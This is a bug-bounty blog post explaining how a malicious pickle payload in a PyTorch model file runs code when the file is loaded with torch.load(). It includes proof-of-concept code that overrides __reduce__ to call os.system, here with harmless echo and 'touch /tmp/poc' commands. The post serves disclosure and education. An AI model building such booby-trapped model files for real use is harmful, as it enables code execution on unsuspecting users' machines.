Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.

The Vulnerability Explained

The Role of Pickle in PyTorch

  • Serialization with pickle:
    PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. This allows models to be saved and reloaded with ease.

  • The Risk Factor:
    The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they control what happens during deserialization, leading to arbitrary code execution, as the short sketch below shows.
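
    To make the risk concrete, here is a minimal sketch using plain pickle (no PyTorch involved); the class name and the echoed string are illustrative only:

      import os
      import pickle

      class Malicious:
          def __reduce__(self):
              # pickle stores the (callable, args) pair returned here;
              # whatever it describes is executed when the bytes are loaded.
              return (os.system, ("echo code ran at load time",))

      payload = pickle.dumps(Malicious())
      pickle.loads(payload)  # runs the echo command on the loading machine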

A Step-by-Step Walkthrough

  1. Crafting the Malicious Model:

    A custom PyTorch module is defined to override __reduce__. In our proof-of-concept (PoC), the overridden method instructs the deserialization process to run an OS command—touch /tmp/poc—as soon as the model is loaded.
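
    A minimal sketch of what this step might look like; the class name MaliciousModel and the file name malicious_model.pt are illustrative, not taken verbatim from the original report:

      import os
      import torch
      import torch.nn as nn

      class MaliciousModel(nn.Module):
          def __reduce__(self):
              # Tell pickle to rebuild this object by calling os.system,
              # so loading the file runs a command instead of restoring a module.
              return (os.system, ("touch /tmp/poc",))

      # Serialize the booby-trapped module like any ordinary model.
      torch.save(MaliciousModel(), "malicious_model.pt")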

  2. Executing the Payload:

    When an unsuspecting user loads the model with the standard torch.load() call, the payload triggers and executes arbitrary Python code:
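
    A sketch of the victim's side, reusing the file name assumed above. This fires on PyTorch versions where torch.load() performs full pickle deserialization by default; newer releases require opting out of weights_only loading:

      import torch

      # Simply loading the file deserializes the pickle payload,
      # which runs `touch /tmp/poc` before any model code is ever used.
      model = torch.load("malicious_model.pt")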


This PoC uses the arbitrary code execution for a harmless demonstration: it simply creates the file /tmp/poc on the victim's machine.
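
A quick way to confirm the payload fired, again purely for illustration:

    import os.path

    # After the victim calls torch.load(), the marker file should exist.
    print(os.path.exists("/tmp/poc"))  # True if the payload executed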

Why Should You Care?

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:

  • Endless Discovery Potential: Use this PoC as a launchpad to explore similar vulnerabilities across various model formats.
  • Lucrative Rewards: With huntr offering up to $4,000 per validated MFV, your next discovery could be both a reputation boost and a major payday.

Get Involved

This example MFV shows that even the most trusted machine learning frameworks can be exploited. By understanding the mechanics of PyTorch’s pickle deserialization, you can turn this knowledge into actionable insights—finding and reporting vulnerabilities before they can be exploited in the wild.

At huntr, we offer bounty payouts of up to $4,000 per validated MFV. If you have discovered a vulnerability in how models are serialized, or can demonstrate a novel exploit, submit a detailed PoC via our submission portal. Happy hunting!